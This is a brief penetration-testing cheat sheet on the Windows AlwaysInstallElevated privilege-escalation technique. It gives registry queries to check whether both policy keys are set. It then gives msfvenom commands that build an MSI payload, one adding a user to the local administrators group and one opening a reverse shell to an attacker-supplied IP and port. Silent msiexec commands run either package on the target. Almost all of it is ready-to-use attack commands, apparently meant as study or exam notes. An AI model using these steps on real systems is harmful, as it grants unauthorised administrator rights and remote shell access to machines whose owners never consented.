# Always Install Elevated

### Check with:

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

From the output, notice that "**AlwaysInstallElevated**" value is **1**. This needs to be on both to be exploited.

### Steps:

```
# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

OR

# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi

# Run it on the target machine:
msiexec /quiet /qn /i setup.msi 
msiexec /quiet /qn /i reverse.msi        <--- Needs a netcat listener
```